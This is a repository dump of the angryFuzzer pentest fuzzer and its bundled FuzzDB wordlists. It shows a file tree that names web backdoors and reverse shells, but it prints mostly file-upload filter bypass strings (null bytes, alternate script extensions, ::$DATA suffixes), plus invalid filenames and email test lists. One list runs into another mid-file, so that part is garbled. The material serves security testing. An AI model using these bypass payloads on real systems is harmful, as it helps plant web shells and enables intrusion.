├── README.md ├── angryFuzzer.py ├── fuzzdb ├── README.md ├── _copyright.txt ├── attack │ ├── README.md │ ├── all-attacks │ │ ├── all-attacks-unix.txt │ │ ├── all-attacks-win.txt │ │ └── all-attacks-xplatform.txt │ ├── business-logic │ │ ├── CommonDebugParamNames.txt │ │ ├── CommonMethodNames.txt │ │ └── DebugParams.Json.fuzz.txt │ ├── control-chars │ │ ├── HexValsAllBytes.txt │ │ ├── NullByteRepresentations.txt │ │ ├── imessage.txt │ │ └── terminal-escape-codes.txt │ ├── disclosure-directory │ │ └── directory-indexing-generic.txt │ ├── disclosure-localpaths │ │ └── unix │ │ │ └── common-unix-httpd-log-locations.txt │ ├── disclosure-source │ │ ├── README.md │ │ ├── source-disc-cmd-exec-traversal.txt │ │ ├── source-disclosure-generic.txt │ │ └── source-disclosure-microsoft.txt │ ├── email │ │ ├── invalid-email-addresses.txt │ │ └── valid-email-addresses.txt │ ├── file-upload │ │ ├── README.md │ │ ├── alt-extensions-asp.txt │ │ ├── alt-extensions-coldfusion.txt │ │ ├── alt-extensions-jsp.txt │ │ ├── alt-extensions-perl.txt │ │ ├── alt-extensions-php.txt │ │ ├── file-ul-filter-bypass-commonly-writable-directories.txt │ │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt │ │ ├── file-ul-filter-bypass-microsoft-asp.txt │ │ ├── file-ul-filter-bypass-ms-php.txt │ │ ├── file-ul-filter-bypass-x-platform-generic.txt │ │ ├── file-ul-filter-bypass-x-platform-php.txt │ │ ├── invalid-filenames-linux.txt │ │ ├── invalid-filenames-microsoft.txt │ │ ├── invalid-filesystem-chars-microsoft.txt │ │ ├── invalid-filesystem-chars-osx.txt │ │ └── malicious-images │ │ │ ├── POC_img_phpinfo-CR.gif │ │ │ ├── POC_img_phpinfo-LF-CR.gif │ │ │ ├── POC_phpinfo-metadata.gif │ │ │ ├── POC_phpinfo-metadata.jpg │ │ │ ├── README.md │ │ │ ├── eicar.com.txt │ │ │ ├── lottapixel.jpg │ │ │ ├── uber.gif │ │ │ └── xssproject.swf │ ├── format-strings │ │ └── format-strings.txt │ ├── html_js_fuzz │ │ ├── HTML5sec_Injections.txt │ │ ├── html_attributes.txt │ │ ├── html_tags.txt │ │ ├── javascript_events.txt │ │ ├── js_inject.txt │ │ └── quotationmarks.txt │ ├── http-protocol │ │ ├── README.md │ │ ├── crlf-injection.txt │ │ ├── docs.http-method-defs.html │ │ ├── hpp.txt │ │ ├── http-header-cache-poison.txt │ │ ├── http-protocol-methods.txt │ │ ├── http-request-header-field-names.txt │ │ ├── http-response-header-field-names.txt │ │ ├── known-uri-types.txt │ │ └── user-agents.txt │ ├── integer-overflow │ │ └── integer-overflows.txt │ ├── ip │ │ └── localhost.txt │ ├── json │ │ └── JSON_Fuzzing.txt │ ├── ldap │ │ ├── README.md │ │ └── ldap-injection.txt │ ├── lfi │ │ ├── JHADDIX_LFI.txt │ │ ├── README.md │ │ ├── common-ms-httpd-log-locations.txt │ │ └── common-unix-httpd-log-locations.txt │ ├── mimetypes │ │ └── MimeTypes.txt │ ├── no-sql-injection │ │ ├── Readme.md │ │ └── mongodb.txt │ ├── os-cmd-execution │ │ ├── Commands-Linux.txt │ │ ├── Commands-OSX.txt │ │ ├── Commands-Windows.txt │ │ ├── Commands-WindowsPowershell.txt │ │ ├── OSCommandInject.Windows.txt │ │ ├── README.md │ │ ├── command-execution-unix.txt │ │ ├── command-injection-template.txt │ │ ├── shell-delimiters.txt │ │ ├── shell-operators.txt │ │ ├── source-disc-cmd-exec-traversal.txt │ │ ├── useful-commands-unix.txt │ │ └── useful-commands-windows.txt │ ├── os-dir-indexing │ │ └── directory-indexing.txt │ ├── path-traversal │ │ ├── README.md │ │ ├── path-traversal-windows.txt │ │ └── traversals-8-deep-exotic-encoding.txt │ ├── redirect │ │ ├── README.md │ │ ├── redirect-injection-template.txt │ │ └── redirect-urls-template.txt │ ├── rfi │ │ ├── README.md │ │ └── rfi.txt │ ├── server-side-include │ │ └── server-side-includes-generic.txt │ ├── sql-injection │ │ ├── detect │ │ │ ├── GenericBlind.txt │ │ │ ├── Generic_SQLI.txt │ │ │ ├── MSSQL.txt │ │ │ ├── MSSQL_blind.txt │ │ │ ├── MySQL.txt │ │ │ ├── MySQL_MSSQL.txt │ │ │ ├── README.md │ │ │ ├── oracle.txt │ │ │ └── xplatform.txt │ │ ├── exploit │ │ │ ├── README.md │ │ │ ├── db2-enumeration.txt │ │ │ ├── ms-sql-enumeration.txt │ │ │ ├── mysql-injection-login-bypass.txt │ │ │ ├── mysql-read-local-files.txt │ │ │ └── postgres-enumeration.txt │ │ └── payloads-sql-blind │ │ │ ├── README.md │ │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt │ │ │ ├── payloads-sql-blind-MSSQL-WHERE.txt │ │ │ ├── payloads-sql-blind-MySQL-INSERT.txt │ │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt │ │ │ └── payloads-sql-blind-MySQL-WHERE.txt │ ├── string-expansion │ │ └── shell-expansion.txt │ ├── unicode │ │ ├── README.md │ │ ├── corrupted.txt │ │ ├── emoji.txt │ │ ├── japanese-emoticon.txt │ │ ├── naughty-unicode.txt │ │ ├── regionalindicators.txt │ │ ├── right-to-left.txt │ │ ├── specialchars.txt │ │ ├── two-byte-chars.txt │ │ └── upsidedown.txt │ ├── xml │ │ └── xml-attacks.txt │ ├── xpath │ │ ├── README.md │ │ └── xpath-injection.txt │ └── xss │ │ ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt │ │ ├── README.md │ │ ├── XSSPolyglot.txt │ │ ├── all-encodings-of-lt.txt │ │ ├── default-javascript-event-attributes.txt │ │ ├── html-event-attributes.txt │ │ ├── test.xxe │ │ ├── xss-other.txt │ │ ├── xss-rsnake.txt │ │ └── xss-uri.txt ├── discovery │ ├── UserAgent │ │ ├── UserAgentListCommon.txt │ │ ├── UserAgentListLarge.txt │ │ └── UserAgents.txt │ ├── dns │ │ ├── CcTLD.txt │ │ ├── alexaTop1mAXFRcommonSubdomains.txt │ │ ├── dnsmapCommonSubdomains.txt │ │ └── gTLD.txt │ └── predictable-filepaths │ │ ├── KitchensinkDirectories.txt │ │ ├── Randomfiles.txt │ │ ├── UnixDotfiles.txt │ │ ├── backdoors │ │ ├── ASP_CommonBackdoors.txt │ │ ├── bot_control_panels.txt │ │ └── shells.txt │ │ ├── cgi │ │ ├── CGI_HTTP_POST.txt │ │ ├── CGI_HTTP_POST_Windows.txt │ │ ├── CGI_Microsoft.txt │ │ └── CGI_XPlatform.txt │ │ ├── cms │ │ ├── README.md │ │ ├── drupal_plugins.txt │ │ ├── drupal_themes.txt │ │ ├── joomla_plugins.txt │ │ ├── joomla_themes.txt │ │ ├── php-nuke.txt │ │ ├── wordpress.txt │ │ ├── wp_common_theme_files.txt │ │ ├── wp_plugins.txt │ │ ├── wp_plugins_top225.txt │ │ ├── wp_themes.readme │ │ └── wp_themes.txt │ │ ├── dicc.txt │ │ ├── filename-dirname-bruteforce │ │ ├── 3CharExtBrute.txt │ │ ├── CommonWebExtensions.txt │ │ ├── Extensions.Backup.txt │ │ ├── Extensions.Common.txt │ │ ├── Extensions.Compressed.txt │ │ ├── Extensions.Mostcommon.txt │ │ ├── Extensions.Skipfish.txt │ │ ├── WordlistSkipfish.txt │ │ ├── copy_of.txt │ │ ├── raft-large-directories-lowercase.txt │ │ ├── raft-large-directories.txt │ │ ├── raft-large-extensions-lowercase.txt │ │ ├── raft-large-extensions.txt │ │ ├── raft-large-files-lowercase.txt │ │ ├── raft-large-files.txt │ │ ├── raft-large-words-lowercase.txt │ │ ├── raft-large-words.txt │ │ ├── raft-medium-directories-lowercase.txt │ │ ├── raft-medium-directories.txt │ │ ├── raft-medium-extensions-lowercase.txt │ │ ├── raft-medium-extensions.txt │ │ ├── raft-medium-files-lowercase.txt │ │ ├── raft-medium-files.txt │ │ ├── raft-medium-words-lowercase.txt │ │ ├── raft-medium-words.txt │ │ ├── raft-small-directories-lowercase.txt │ │ ├── raft-small-directories.txt │ │ ├── raft-small-extensions-lowercase.txt │ │ ├── raft-small-extensions.txt │ │ ├── raft-small-files-lowercase.txt │ │ ├── raft-small-files.txt │ │ ├── raft-small-words-lowercase.txt │ │ ├── raft-small-words.txt │ │ ├── spanish.txt │ │ ├── test_demo.txt │ │ └── upload_variants.txt │ │ ├── login-file-locations │ │ ├── Logins.txt │ │ ├── cfm.txt │ │ ├── html.txt │ │ ├── jsp.txt │ │ ├── php.txt │ │ ├── windows-asp.txt │ │ └── windows-aspx.txt │ │ ├── password-file-locations │ │ └── Passwords.txt │ │ ├── php │ │ ├── PHP.txt │ │ └── PHP_CommonBackdoors.txt │ │ ├── proxy-conf.txt │ │ ├── tftp.txt │ │ ├── webservers-appservers │ │ ├── ADFS.txt │ │ ├── AdobeXML.txt │ │ ├── Apache.txt │ │ ├── ApacheTomcat.txt │ │ ├── Apache_Axis.txt │ │ ├── ColdFusion.txt │ │ ├── FatwireCMS.txt │ │ ├── Frontpage.txt │ │ ├── HP_System_Mgmt_Homepage.txt │ │ ├── HTTP_POST_Microsoft.txt │ │ ├── Hyperion.txt │ │ ├── IIS.txt │ │ ├── JBoss.txt │ │ ├── JRun.txt │ │ ├── JavaServlets_Common.txt │ │ ├── Joomla_exploitable.txt │ │ ├── LotusNotes.txt │ │ ├── Netware.txt │ │ ├── Oracle9i.txt │ │ ├── OracleAppServer.txt │ │ ├── README.md │ │ ├── Ruby_Rails.txt │ │ ├── SAP.txt │ │ ├── Sharepoint.txt │ │ ├── SiteMinder.txt │ │ ├── SunAppServerGlassfish.txt │ │ ├── SuniPlanet.txt │ │ ├── Vignette.txt │ │ ├── Weblogic.txt │ │ └── Websphere.txt │ │ └── wellknown-rfc5785.txt ├── docs │ ├── attack-docs │ │ ├── remote-cmd-exfiltration │ │ │ ├── Web-Shells-rev2.pdf │ │ │ ├── netcat_cheat_sheet_v1.pdf │ │ │ └── windows_command_line_sheet_v1.pdf │ │ ├── rfi-cheatsheet.html │ │ ├── source-directory-file-indexing-cheatsheet.html │ │ ├── sqli │ │ │ ├── docs.oracle_cheat.pdf │ │ │ └── docs.sql_injection_cheatsheet.html │ │ ├── waf-bypass │ │ │ └── regexp-security-cheatsheet.md │ │ └── xss │ │ │ └── docs.wasc-scriptmapping │ │ │ ├── ScriptMapping_Release_26Nov2007.html │ │ │ ├── images │ │ │ ├── ff2.png │ │ │ ├── ie7.png │ │ │ └── safari3.png │ │ │ └── license.txt │ └── misc │ │ ├── KL0209LIT_fffap.html │ │ ├── Web-Shells-rev2.pdf │ │ ├── Wireshark_Display_Filters.pdf │ │ └── htmlcodes-cheatsheet.htm ├── regex │ ├── README.md │ ├── amazon.txt │ ├── breakpoint-ignores.txt │ ├── errors.txt │ ├── nsa-wordlist.txt │ ├── pii.readme.txt │ ├── pii.txt │ └── sessionid.txt ├── web-backdoors │ ├── README.md │ ├── asp │ │ ├── cmd-asp-5.1.asp │ │ ├── cmd.asp │ │ ├── cmd.aspx │ │ ├── cmdasp.asp │ │ ├── cmdasp.aspx │ │ ├── dns.asp │ │ ├── file.asp │ │ ├── list.asp │ │ ├── list.txt │ │ ├── ntdaddy.asp │ │ ├── proxy.asp │ │ ├── shell.asp │ │ ├── shell.aspx │ │ └── up.asp │ ├── c │ │ └── cmd.c │ ├── cfm │ │ ├── cfExec.cfm │ │ ├── cfSQL.cfm │ │ ├── cmd.cfm │ │ └── shell.cfm │ ├── exe │ │ └── nc.exe │ ├── jsp │ │ ├── CmdServlet.class │ │ ├── CmdServlet.java │ │ ├── ListServlet.class │ │ ├── ListServlet.java │ │ ├── UpServlet.class │ │ ├── UpServlet.java │ │ ├── browser.jsp │ │ ├── cmd.jsp │ │ ├── cmdjsp.jsp │ │ ├── jsp-reverse.jsp │ │ ├── laudanum │ │ │ ├── cmd.war │ │ │ ├── makewar.sh │ │ │ └── warfiles │ │ │ │ ├── META-INF │ │ │ │ └── MANIFEST.MF │ │ │ │ ├── WEB-INF │ │ │ │ └── web.xml │ │ │ │ └── cmd.jsp │ │ ├── list.jsp │ │ ├── simple.jsp │ │ ├── up.jsp │ │ └── win32 │ │ │ ├── cmd_win32.jsp │ │ │ └── up_win32.jsp │ ├── php │ │ ├── cmd.php │ │ ├── dns.php │ │ ├── file.php │ │ ├── host.php │ │ ├── killnc.php │ │ ├── list.php │ │ ├── php-backdoor.php │ │ ├── php-reverse-shell.php │ │ ├── proxy.php │ │ ├── shell.php │ │ ├── simple-backdoor.php │ │ ├── tiny.php │ │ └── up.php │ ├── pl-cgi │ │ ├── cmd.pl │ │ ├── list.pl │ │ ├── perlcmd.cgi │ │ └── up.pl │ ├── servlet │ │ ├── CmdServlet.java │ │ ├── ListServlet.java │ │ └── UpServlet.java │ ├── sh │ │ ├── cmd.sh │ │ ├── list.sh │ │ └── up.sh │ └── wordpress │ │ ├── laudanum.php │ │ └── templates │ │ ├── README.md │ │ ├── dns.php │ │ ├── file.php │ │ ├── host.php │ │ ├── ipcheck.php │ │ ├── killnc.php │ │ ├── php-reverse-shell.php │ │ ├── proxy.php │ │ ├── settings.php │ │ └── shell.php ├── wordlists-misc │ ├── accidental_profanity.txt │ ├── common-http-ports.txt │ ├── numeric.txt │ ├── us_cities.txt │ ├── wordlist-alphanumeric-case.txt │ ├── wordlist-common-snmp-community-strings.txt │ └── wordlist-dna.txt └── wordlists-user-passwd │ ├── db2 │ ├── db2_default_pass.txt │ ├── db2_default_user.txt │ └── db2_default_userpass.txt │ ├── faithwriters.txt │ ├── generic-listpairs │ ├── http_default_pass.txt │ ├── http_default_userpass.txt │ └── http_default_users.txt │ ├── names │ └── namelist.txt │ ├── oracle │ ├── _hci_oracle_passwords.txt │ ├── _oracle_default_passwords.txt │ ├── oracle_login_password.txt │ ├── oracle_logins.txt │ └── oracle_passwords.txt │ ├── passwds │ ├── john.txt │ ├── phpbb.txt │ ├── twitter.txt │ └── weaksauce.txt │ ├── postgres │ ├── postgres_default_pass.txt │ ├── postgres_default_user.txt │ └── postgres_default_userpass.txt │ ├── readme.txt │ ├── tomcat │ ├── tomcat_mgr_default_pass.txt │ ├── tomcat_mgr_default_userpass.txt │ └── tomcat_mgr_default_users.txt │ └── unix-os │ ├── unix_passwords.txt │ └── unix_users.txt ├── lib ├── __init__.py ├── __init__.pyc ├── colors.py └── colors.pyc └── requirements.txt /README.md: -------------------------------------------------------------------------------- 1 | # AngryFuzz3r 2 | ![screen_1](http://i.imgur.com/QetqbO1.png) 3 | 4 | Status: **Development** 5 | ## About the AngryFuzz3r project 6 | AngryFuzz3r is a collection of tools for pentesting to gather information and discover vulnerabilities of the targets based on Fuzzedb https://github.com/fuzzdb-project/fuzzdb project 7 | ## UrlFuzz3r->AngryFuzz3r_1 8 | Discover hidden files and directories on a web server. The application tries to find url relative paths of the given website by comparing them with a given set . 9 | 10 | ## Features 11 | 12 | * Fuzz url set from an input file 13 | * Concurrent relative path search 14 | * Configurable number of fuzzing workers 15 | * Fuzz CMS ==> Wordpress,Durpal,Joomla 16 | * Generate reports of the valid paths 17 | ## Usage 18 | 19 | ~~~ 20 | $ python angryFuzzer.py -h 21 | Usage: angryFuzzer.py [options] 22 | 23 | Options: 24 | -h, --help show this help message and exit 25 | -q, --quiet Silent mode ,only reports 26 | -u URL, --url=URL URL of the Target 27 | -c CMS, --cms=CMS scan CMS ==> wp ,dp 28 | -w WORDLIST, --wordlist=WORDLIST 29 | Custom wordlist 30 | 31 | ~~~ 32 | 33 | Example: 34 | * Fuzzing an url with default dictionary 35 | ~~~ 36 | python angryFuzzer.py -u http://127.0.0.1 37 | ~~~ 38 | 39 | * Fuzzing CMS (wp: in this exemple !) 40 | ~~~ 41 | python angryFuzzer.py -u http://127.0.0.1 --cms wp 42 | ~~~ 43 | 44 | * Fuzzing a custom Wordlist 45 | ~~~ 46 | python angryFuzzer.py -u http://127.0.0.1 -w fuzzdb/discovery/predictable-filepaths/php/PHP.txt 47 | ~~~ 48 | ![screen_2](http://i.imgur.com/0C4Lb42.png) 49 | 50 | 51 | 52 | ## How to install 53 | ##### Clone 54 | - Clone the repository with: 55 | ```sh 56 | $ git clone https://github.com/ihebski/angryFuzzer.git 57 | $ cd angryFuzzer 58 | $ python angryFuzzer.py 59 | ``` 60 | ##### Dependencies 61 | * Install the required dependencies with: 62 | ```bash 63 | $ sudo pip install -r requirements.txt 64 | ``` 65 | ## License 66 | The MIT License (MIT) 67 | -------------------------------------------------------------------------------- /fuzzdb/attack/README.md: -------------------------------------------------------------------------------- 1 |

FuzzDB Attack Patterns

2 | 3 | **WAF Evasion**
4 | * Regexp security Cheatsheet 5 | * Source: https://github.com/attackercan/regexp-security-cheatsheet/blob/master/README.md 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/all-attacks/all-attacks-xplatform.txt: -------------------------------------------------------------------------------- 1 | !' 2 | !@#$%%^#$%#$@#$%$$@#$%^^**(() 3 | !@#0%^#0##018387@#0^^**(() 4 | "><"test@address.com 24 | a"b(c)d,e:f;gi[j\k]l@example.com 25 | this is"not\allowed@example.com 26 | notallowed@example.com 27 | notallowed@example.com 28 | -------------------------------------------------------------------------------- /fuzzdb/attack/email/valid-email-addresses.txt: -------------------------------------------------------------------------------- 1 | email@eaddress.com 2 | firstname.lastname@address.com 3 | email@subdomain.address.com 4 | firstname+lastname@address.com 5 | name@129.129.129.129 6 | name@[129.129.129.129] 7 | 0123456789@address.com 8 | email@address-one.com 9 | email@address.name 10 | email@address.co.jp 11 | firstname-lastname@address.com 12 | much."more\ unusual"@address.com 13 | very.unusual."@".unusual.com@address.com 14 | very."(),:;<>[]".VERY."very@\\ "very".unusual@strange.address.com 15 | abcdefghijklmnopqrstuvwxyz!#$%&'*+-/=?^_`{|}~.0123456789@abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.com 16 | {jacco'vantuijl}@address.server 17 | "Jacco\@test"@address.com 18 | "Jacco van Tuijl"@address.com 19 | "Jacco\\test"@address.com 20 | "Jacco@test"@address.com 21 | Jacco/van=Tuijl@address.com 22 | \$A12345@address.com 23 | !def!abc%dfg@address.com 24 | _jacco@address.com 25 | a.long.email.address.test@dept.address.com 26 | "jacco.vantuijl.@.address.com"@address.com 27 | jacco@mailserver1 28 | #!$%&'*+-/=?^_`{}|~@address.org 29 | "()<>[]:,;@\\\"!#$%&'*+-/=?^_`{}| ~.a"@address.org 30 | " "@address.org 31 | üñîçøðé@address.com 32 | address@üñîçøðé.com 33 | üñîçøðé@üñîçøðé.com -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/alt-extensions-asp.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | asa 4 | aSP 5 | aSpx 6 | aSa 7 | asp%20%20%20 8 | aspx%20%20%20 9 | asa%20%20%20 10 | aSP%20%20%20 11 | aSpx%20%20%20 12 | aSa%20%20%20 13 | asp...... 14 | aspx...... 15 | asa...... 16 | aSP...... 17 | aSpx...... 18 | aSa...... 19 | asp%20%20%20...%20.%20.. 20 | aspx%20%20%20...%20.%20.. 21 | asa%20%20%20...%20.%20.. 22 | aSP%20%20%20...%20.%20.. 23 | aSpx%20%20%20...%20.%20.. 24 | aSa%20%20%20...%20.%20.. 25 | asp%00 26 | aspx%00 27 | asa%00 28 | aSp%00 29 | aSpx%00 30 | aSa%00 31 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/alt-extensions-coldfusion.txt: -------------------------------------------------------------------------------- 1 | cfm 2 | cfml 3 | cfc 4 | dbm 5 | cFm 6 | cFml 7 | cFc 8 | dBm 9 | cfm%20%20%20 10 | cfml%20%20%20 11 | cfc%20%20%20 12 | dbm%20%20%20 13 | cFm%20%20%20 14 | cFml%20%20%20 15 | cFc%20%20%20 16 | dBm%20%20%20 17 | cfm...... 18 | cfml...... 19 | cfc....... 20 | dbm...... 21 | cFm...... 22 | cFml...... 23 | cFc...... 24 | dBm...... 25 | cfm%20%20%20...%20.%20.. 26 | cfml%20%20%20...%20.%20.. 27 | cfc%20%20%20...%20.%20.. 28 | dbm%20%20%20...%20.%20.. 29 | cFm%20%20%20...%20.%20.. 30 | cFml%20%20%20...%20.%20.. 31 | cFc%20%20%20...%20.%20.. 32 | dBm%20%20%20...%20.%20.. 33 | cfm%00 34 | cfml%00 35 | cfc%00 36 | dbm%00 37 | cFm%00 38 | cFml%00 39 | cFc%00 40 | dBm%00 41 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/alt-extensions-jsp.txt: -------------------------------------------------------------------------------- 1 | jsp 2 | jspx 3 | jsw 4 | jsv 5 | jspf 6 | jSp 7 | jSpx 8 | jSw 9 | jSv 10 | jSpf 11 | jSp%00 12 | jSp%20%20%20 13 | jSp%20%20%20...%20.%20..a 14 | jSp...... 15 | jSpf%00 16 | jSpf%20%20%20 17 | jSpf%20%20%20...%20.%20..a 18 | jSpf...... 19 | jSpx%00 20 | jSpx%20%20%20 21 | jSpx%20%20%20...%20.%20..a 22 | jSpx...... 23 | jSv%00 24 | jSv%20%20%20 25 | jSv%20%20%20...%20.%20..a 26 | jSv...... 27 | jSw%00 28 | jSw%20%20%20 29 | jSw%20%20%20...%20.%20..a 30 | jSw...... 31 | jsp%00 32 | jsp%20%20%20 33 | jsp%20%20%20...%20.%20..a 34 | jsp...... 35 | jspf%00 36 | jspf%20%20%20 37 | jspf%20%20%20...%20.%20..a 38 | jspf...... 39 | jspx%00 40 | jspx%20%20%20 41 | jspx%20%20%20...%20.%20..a 42 | jspx...... 43 | jsv%00 44 | jsv%20%20%20 45 | jsv%20%20%20...%20.%20..a 46 | jsv...... 47 | jsw%00 48 | jsw%20%20%20 49 | jsw%20%20%20...%20.%20..a 50 | jsw...... 51 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/alt-extensions-perl.txt: -------------------------------------------------------------------------------- 1 | # .pm .lib cannot be called directly, must be called as modules 2 | pl 3 | pm 4 | cgi 5 | pL 6 | pM 7 | cGi 8 | lib 9 | lIb 10 | cGi%00 11 | cGi%20%20%20 12 | cGi...... 13 | cgi%00 14 | cgi%20%20%20 15 | cgi...... 16 | lIb%00 17 | lIb%20%20%20 18 | lIb...... 19 | lib%00 20 | lib%20%20%20 21 | lib...... 22 | pL%00 23 | pL%20%20%20 24 | pL...... 25 | pM%00 26 | pM%20%20%20 27 | pM...... 28 | pl%00 29 | pl%20%20%20 30 | pl...... 31 | pm%00 32 | pm%20%20%20 33 | pm...... 34 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/alt-extensions-php.txt: -------------------------------------------------------------------------------- 1 | phtml 2 | php 3 | php3 4 | php4 5 | php5 6 | inc 7 | pHtml 8 | pHp 9 | pHp3 10 | pHp4 11 | pHp5 12 | iNc 13 | iNc%00 14 | iNc%20%20%20 15 | iNc%20%20%20...%20.%20.. 16 | iNc...... 17 | inc%00 18 | inc%20%20%20 19 | inc%20%20%20...%20.%20.. 20 | inc...... 21 | pHp%00 22 | pHp%20%20%20 23 | pHp%20%20%20...%20.%20.. 24 | pHp...... 25 | pHp3%00 26 | pHp3%20%20%20 27 | pHp3%20%20%20...%20.%20.. 28 | pHp3...... 29 | pHp4%00 30 | pHp4%20%20%20 31 | pHp4%20%20%20...%20.%20.. 32 | pHp4...... 33 | pHp5%00 34 | pHp5%20%20%20 35 | pHp5%20%20%20...%20.%20.. 36 | pHp5...... 37 | pHtml%00 38 | pHtml%20%20%20 39 | pHtml%20%20%20...%20.%20.. 40 | pHtml...... 41 | php%00 42 | php%20%20%20 43 | php%20%20%20...%20.%20.. 44 | php...... 45 | php3%00 46 | php3%20%20%20 47 | php3%20%20%20...%20.%20.. 48 | php3...... 49 | php4%00 50 | php4%20%20%20 51 | php4%20%20%20...%20.%20.. 52 | php4...... 53 | php5%00 54 | php5%20%20%20 55 | php5%20%20%20...%20.%20.. 56 | php5...... 57 | phtml%00 58 | phtml%20%20%20 59 | phtml%20%20%20...%20.%20.. 60 | phtml...... 61 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt: -------------------------------------------------------------------------------- 1 | templates_compiled 2 | templates_c 3 | templates 4 | temporary 5 | images 6 | cache 7 | temp 8 | files 9 | tmp 10 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt: -------------------------------------------------------------------------------- 1 | {ASPSCRIPT} 2 | {ASPSCRIPT}.{EXT} 3 | {ASPSCRIPT}; 4 | {ASPSCRIPT};.{EXT} 5 | {ASPSCRIPT}%00 6 | {ASPSCRIPT}%00.{EXT} 7 | {ASPSCRIPT}::data%00. 8 | {ASPSCRIPT}::data%00.{EXT} 9 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt: -------------------------------------------------------------------------------- 1 | {ASPSCRIPT} 2 | {ASPSCRIPT}; 3 | {ASPSCRIPT};.jpg 4 | {ASPSCRIPT};.pdf 5 | {ASPSCRIPT};.html 6 | {ASPSCRIPT};.htm 7 | {ASPSCRIPT};.txt 8 | {ASPSCRIPT};.xyz 9 | {ASPSCRIPT};.zip 10 | {ASPSCRIPT};.tgz 11 | {ASPSCRIPT};.doc 12 | {ASPSCRIPT};.docx 13 | {ASPSCRIPT};.xls 14 | {ASPSCRIPT};.xlsx 15 | {ASPSCRIPT}%00.jpg 16 | {ASPSCRIPT}%00.pdf 17 | {ASPSCRIPT}%00.html 18 | {ASPSCRIPT}%00.txt 19 | {ASPSCRIPT}%00.xyz 20 | {ASPSCRIPT}%00.tgz 21 | {ASPSCRIPT}%00.zip 22 | {ASPSCRIPT}%00.doc 23 | {ASPSCRIPT}%00.docx 24 | {ASPSCRIPT}%00 25 | {ASPSCRIPT}::data%00.jpg 26 | {ASPSCRIPT}::data%00.pdf 27 | {ASPSCRIPT}::data%00.html 28 | {ASPSCRIPT}::data%00.txt 29 | {ASPSCRIPT}::data%00.zip 30 | {ASPSCRIPT}::data%00.doc 31 | {ASPSCRIPT}::data%00.xls 32 | {ASPSCRIPT}%00%20%20%20 33 | {ASPSCRIPT}%00%20%20%20...%20.%20.. 34 | {ASPSCRIPT}%00...... 35 | {ASPSCRIPT}%20%20%20 36 | {ASPSCRIPT}%20%20%20...%20.%20.. 37 | {ASPSCRIPT}...... 38 | {ASPSCRIPT}::data%00%%20%20%20 39 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20.. 40 | {ASPSCRIPT}::data%00%...... 41 | {ASPSCRIPT}%00%20%20%20;.jpg 42 | {ASPSCRIPT}%00%20%20%20;.doc 43 | {ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg 44 | {ASPSCRIPT}%00%20%20%20...%20.%20..;.doc 45 | {ASPSCRIPT}%00......;.jpg 46 | {ASPSCRIPT}%00......;.doc 47 | {ASPSCRIPT}%20%20%20;.jpg 48 | {ASPSCRIPT}%20%20%20;.doc 49 | {ASPSCRIPT}%20%20%20...%20.%20..;.jpg 50 | {ASPSCRIPT}%20%20%20...%20.%20..;.doc 51 | {ASPSCRIPT}......;.jpg 52 | {ASPSCRIPT}......;.doc 53 | {ASPSCRIPT}::data%00%%20%20%20;.jpg 54 | {ASPSCRIPT}::data%00%%20%20%20;.doc 55 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg 56 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc 57 | {ASPSCRIPT}::data%00%......;.jpg 58 | {ASPSCRIPT}::data%00%......;.doc 59 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-ms-php.txt: -------------------------------------------------------------------------------- 1 | {PHPSCRIPT} 2 | {PHPSCRIPT}.phtml 3 | {PHPSCRIPT}.php.html 4 | {PHPSCRIPT}.php::$DATA 5 | {PHPSCRIPT}.php.php.rar 6 | {PHPSCRIPT}.php.rar 7 | {PHPSCRIPT}::$DATA 8 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt: -------------------------------------------------------------------------------- 1 | %00index.html 2 | ;index.html 3 | %00 4 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt: -------------------------------------------------------------------------------- 1 | {PHPSCRIPT} 2 | {PHPSCRIPT}.phtml 3 | {PHPSCRIPT}.php.html 4 | {PHPSCRIPT}.php.php.rar 5 | {PHPSCRIPT}.php.rar 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/invalid-filenames-linux.txt: -------------------------------------------------------------------------------- 1 | / 2 | 3 | \0 4 | /dev/null 5 | /dev/null/foo 6 | . 7 | .. -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/invalid-filenames-microsoft.txt: -------------------------------------------------------------------------------- 1 | A: 2 | ZZ: 3 | CON 4 | PRN 5 | AUX 6 | CLOCK$ 7 | NUL 8 | COM1 9 | COM2 10 | COM3 11 | COM4 12 | COM5 13 | COM6 14 | COM7 15 | COM8 16 | COM9 17 | LPT1 18 | LPT2 19 | LPT3 20 | LPT4 21 | LPT5 22 | LPT6 23 | LPT7 24 | LPT8 25 | LPT9 26 | * 27 | " 28 | [ 29 | ] 30 | : 31 | | 32 | = 33 | , 34 | CON.{EXT} 35 | PRN.{EXT} 36 | AUX.{EXT} 37 | CLOCK$.{EXT} 38 | NUL.{EXT} 39 | COM1.{EXT} 40 | COM2.{EXT} 41 | COM3.{EXT} 42 | COM4.{EXT} 43 | COM5.{EXT} 44 | COM6.{EXT} 45 | COM7.{EXT} 46 | COM8.{EXT} 47 | COM9.{EXT} 48 | LPT1.{EXT} 49 | LPT2.{EXT} 50 | 